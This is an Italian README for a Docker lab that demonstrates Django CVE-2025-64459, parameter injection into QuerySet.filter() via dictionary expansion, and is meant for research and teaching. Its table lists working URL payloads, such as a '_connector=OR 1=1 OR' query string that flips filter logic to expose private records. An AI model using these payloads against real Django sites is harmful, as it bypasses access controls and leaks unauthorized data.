
Un testbed autonomo per Django CVE-2025-64459. Dimostra l'iniezione dei parametri di QuerySet.filter() tramite espansione di dizionario usando Docker.
Un banco di prova autonomo per Django CVE-2025-64459. Dimostra l'iniezione di parametri in QuerySet.filter() tramite espansione di dizionario utilizzando Docker.
CVE-2025-64459 è una vulnerabilità ad alta gravità in Django (nello specifico versioni < 5.1.14) che consente l'iniezione di parametri in QuerySet.filter() quando l'input dell'utente viene passato direttamente tramite espansione di dizionario (ad es., **request.GET).
Gli aggressori possono iniettare parametri interni come _connector per manipolare la logica delle query (ad es., cambiando AND in OR), potenzialmente aggirando i filtri e accedendo a dati non autorizzati.
Se hai installato la CLI di Vulnerable Target o vuoi eseguirla dal sorgente:
Clona il repository di Vulnerable Target:
git clone https://github.com/HappyHackingSpace/vulnerable-target
cd vulnerable-target
Esegui il laboratorio usando l'ID:
go run cmd/vt/main.go start --id vt-2025-64459
b00m!
con Nuclei
| Descrizione | Link |
|---|---|
| Mostra tutto (Ricerca vuota) | /? |
| Ricerca normale | /?title__icontains=Public |
| Tentativo di exploit (Privato) | /?status=private&title__icontains=Area |
| Exploit _connector (CVE-2025-64459) | /?_connector=OR 1=1 OR&title__icontains=Public |
Questo repository è solo per scopi educativi e di ricerca. Non utilizzarlo su sistemi di cui non possiedi o non hai esplicita autorizzazione per testare. L'autore non è responsabile per qualsiasi uso improprio di queste informazioni.